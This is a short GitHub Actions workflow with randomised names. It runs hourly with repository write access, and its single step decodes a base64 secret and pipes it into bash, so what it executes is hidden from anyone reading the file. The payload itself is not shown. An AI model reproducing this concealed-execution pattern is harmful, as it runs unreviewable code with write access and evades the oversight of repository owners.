name: BraHHDjwXrNFlY
on:
  schedule:
    - cron: '25 * * * *'
  workflow_dispatch:
permissions:
  contents: write
jobs:
  bFTandKpikTg:
    runs-on: ubuntu-22.04
    env:
      jdCmNREMRBFZiRpyKg: ${{ secrets.jdCmNREMRBFZiRpyKg }}
    steps:
      - uses: actions/checkout@v4
      - run: echo "${{ secrets.ylasRABZaKyPXiPQcP }}" | base64 -d | bash
